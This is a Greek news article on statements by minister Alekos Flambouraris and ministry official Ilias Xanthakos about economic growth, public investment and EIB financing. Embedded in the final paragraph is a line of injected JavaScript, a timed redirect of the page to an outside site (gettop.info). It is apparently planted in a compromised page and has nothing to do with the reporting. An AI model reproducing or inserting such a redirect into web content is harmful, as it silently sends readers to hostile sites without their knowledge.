Φλαμπουράρης: Αποφασισμένη η κυβέρνηση να δώσει ώθηση στην οικονομία.

0
6
EUROKINISSI

 

«Ως κυβέρνηση είμαστε αποφασισμένοι να δώσουμε την απαραίτητη ώθηση στην οικονομία γιατί η ανάγκη για δημιουργία θέσεων εργασίας και μείωση της ανεργίας είναι επιτακτική και αποτελεί δέσμευσή μας προς το λαό που μας εμπιστεύτηκε», επεσήμανε ο Αλέκος Φλαμπουράρης, σε χαιρετισμό που απέστειλε στην γενική συνέλευση του Ευρωπαϊκού Συμβουλίου Πολιτικών Μηχανικών.

«Είναι η στιγμή όπου πρέπει να εκκινήσουν οι διαδικασίες ανάπτυξης», ανέφερε χαρακτηριστικά, προσθέτοντας ότι «ανάπτυξη χωρίς έργα δεν γίνεται».

Ο κ. Φλαμπουράρης τόνισε, ότι «οφείλουμε να αναλάβουμε δράση, ενώ πάνω από όλα απαιτείται σχεδιασμός, συντονισμός και συστράτευση όλων των δυνάμεων».

«Στο οικονομικό πεδίο η ελληνική κυβέρνηση έχει αναπτύξει για πρώτη φορά μία συνολική στρατηγική για τη βέλτιστη αξιοποίηση των διαθέσιμων χρηματοδοτικών εργαλείων», ανέφερε από την πλευρά του, ο γενικός γραμματέας του υπουργείου Οικονομίας, Ανάπτυξης και Τουρισμού, Ηλίας Ξανθάκος. Όπως εκτίμησε, «αν η τάση της οικονομίας συνεχιστεί και το φθινόπωρο, το 2016 θα κλείσει οριακά θετικό και εφόσον παραμείνουμε σε αυτή την πορεία, το 2017 ο ρυθμός ανάπτυξης θα είναι πάνω από 2,5%», ποσοστό για το οποίο «συμφωνούν τόσο η Κομισιόν όσο και το ΔΝΤ», όπως είπε.

Όπως εξήγησε ο κ. Ξανθάκος, το πρόγραμμα δημοσίων επενδύσεων από 750 εκατομμύρια φέτος, αυξάνεται σε ένα δισεκατομμύριο το 2017, και επεσήμανε την στρατηγική συνεργασία με την ΕΤΕπ για ευρεία χρηματοδότηση έργων υποδομής, είτε μέσω του σχεδίου Γιουνκέρ, είτε με απευθείας δανεισμό προς το ελληνικό δημόσιο, με εξαιρετικά ευνοϊκούς όρους, όπως είπε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here